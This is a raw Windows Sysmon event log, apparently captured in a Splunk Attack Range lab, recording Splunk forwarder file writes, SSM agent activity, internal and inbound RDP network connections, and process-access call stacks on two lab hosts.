Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21B96CC9D46CE324DC0EDE1EE36FD80C,SHA256=42DF079A3E410AAFF20BF35AA60E662EF18218456AABC19B6633DC5FFB627ED5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048399Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:15.830{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1F16025F1589D71C58AB1166EEB9622,SHA256=9DB76D8AE39C514101397479819A69FD7C7468AA7FD0C76BFCFEF863D1941917,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976958Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:15.071{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB815D55AD04ABC513EDF44A27F590C,SHA256=BFDDD6519921CB473F19E97D4DF83548E89C8152EF0B49617CBB2D9180271EA4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048398Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:12.724{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53230-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048400Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:16.845{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10EABC6F164FCC80EFC9CA5B74147968,SHA256=CA3E8775FFCB409C64EF0462CD98118AA7A18072301FB2DC4A12C059FE126533,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976960Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:12.122{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59279-false10.0.1.12-8089- 23542300x8000000000000000976959Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:16.087{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFF1A5E951836DD991977DB0DCF67E49,SHA256=D6E019155684FD29510CDCBDB8C9B612C4896F642C1DD03AF209569F16B82861,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048405Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:17.848{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5A1A4FA9ACD063181AC4A5E7E97D3DF,SHA256=CA87BD40C38B5FA11865AB53EB9C2C750A52A9BD546257391B8492B046B923B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976963Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:13.042{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-33008-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976962Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:12.903{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59280-false10.0.1.12-8000- 23542300x8000000000000000976961Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:17.087{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12645B4326575F7C8F11D7E2449C3CD5,SHA256=2AB841E1DB309137B61BBD914FA2A8CB4214064FB15EFA0C164471AE4C98A01A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048404Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:15.969{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53231-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001048403Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:15.969{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53231-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001048402Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:15.910{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64151-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048401Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:17.283{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8633FFBB68A5B7B05D90F8890D30CD74,SHA256=11ADB6F9606919647E2D8AE7E82EFAFD4A03D0539793263EB36780C6F859875C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048408Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:18.901{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87756B633F8C044581A69BE51FB74BB3,SHA256=1C9382E6A926611BA5544BD06ACB2C8099B6CE3A2B4F2AFBA580C49E47B57F64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976966Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:18.196{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAC00284D2A12A70908DED18EF743872,SHA256=12E40D005AADD21D2F16ED153A08970252170B34398B46425B9FBD9951ABA620,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976965Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:18.196{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F06E16F6E4E7D0C1F9F36F998360C1B9,SHA256=5463CD28DB4C38BBF2D0784F5E926889BF4DB21649B2C60787411C4FA3548C9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976964Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:18.102{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61EF464718524AC6FBD408386A7B3AC2,SHA256=3AAEF277BC754977403BB31851A913858D822B2D16709C29FD525F92E4E5BA1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048407Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:18.482{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4299MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048406Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:18.333{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B56D11202AB43F61C84253E94D854EA,SHA256=64ABC98D0A1660C6C4670B2F5AFAD2716A074FB23FE1D0606211F17577BC4E2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048410Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:19.916{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=918D36D1BAB2D7E16412308C9FB4BDDC,SHA256=90B007FF5466D082B8B793D114219839D5B63314FD4AA7B42777F5ECC6E25601,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976967Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:19.118{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6688734949D690BDC91F0B630A1E26D,SHA256=0F7B9C61D82BCC76FFD326AC65B4F975BAF06D53D546D512462CADADDE05224C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048409Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:19.481{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4300MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048412Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:20.931{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5814557A2C470F75667A37CCA520DAA,SHA256=92D18B47D4B1BAEDD86C211D8A1EECDEEC326FFCF6651F709DEEEF9A8C0D2C81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976971Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:20.227{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAC00284D2A12A70908DED18EF743872,SHA256=12E40D005AADD21D2F16ED153A08970252170B34398B46425B9FBD9951ABA620,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976970Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:17.454{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-54325-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976969Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:17.145{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-4378-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976968Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:20.134{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B431B95CBD94766F2FBFCBB893F1C355,SHA256=E4A6CFC900DE2AEECF61E06E60F9E8B5B83AB7775E6297FF0861F8924F557B6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048411Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:17.840{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53232-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048414Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:21.946{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94C4F3D7B22E48375FF717CD14824CBB,SHA256=4EB3E4C1CD86371C7A709F30A2DB9B0674FBA562E56585A8A2EE40557D76A047,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976972Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:21.149{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18D9BF176AFBBCFBD60192E22FDF1E74,SHA256=277E63AC5FBD98CF872ADF17F39ACD815C39C18689143FB52E7BBFC1ABD1791B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048413Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:19.967{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60493-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x8000000000000000976974Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:18.778{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59281-false10.0.1.12-8000- 23542300x8000000000000000976973Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:22.165{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=162C020C81279F4070E7869FB2365BB5,SHA256=8CC492FF27E482313B6DEE8408512115A99E334D4B48D66FDFF8D6D66252889E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048415Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:22.032{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F1BD493224334E6A38722D9B9B6082E,SHA256=40579BD76EC503C807836A59BB2A65799A21C1B1A0082914C920FE277D50E8AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976975Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:23.166{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=931D9F62959D0A2058F866F6030BA45E,SHA256=94C7BDCAD379B039FEA5A948C4AF3BB6B53D346B6900C80C33A8073FD04D26D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048417Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:22.244{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61944-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048416Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:23.046{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A152E1B57BF2B75BBA3437E0F2C9A7AB,SHA256=CA62B0F481C1545E761685BF0AC4FD6EFED29A79D825C14EDE417DABC9E78246,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048419Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:24.629{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE278B436658F84A714D1263FE76F7AD,SHA256=A19C1CA9020DB7234D217F4179C2314B26CCCE091D62E2EED11878C54D42E28D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048418Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:24.145{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C8DB86BF2BC82891298889C81427239,SHA256=4686619F833DA45827FB3ED7BE12E67DEB154EB9D289FECFFF13D90228467446,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976977Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:20.422{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-17381-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976976Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:24.166{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B91E9D09AEA54796CAD289DBA1D68A5B,SHA256=5308B9B1B552B41BE080545690D54378485BE1310A7C9A8847881FE25554E4B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976992Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.916{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88DD-6151-8879-00000000FD01}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976991Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.916{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976990Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.916{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976989Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.916{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976988Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.916{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976987Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:25.916{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976986Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 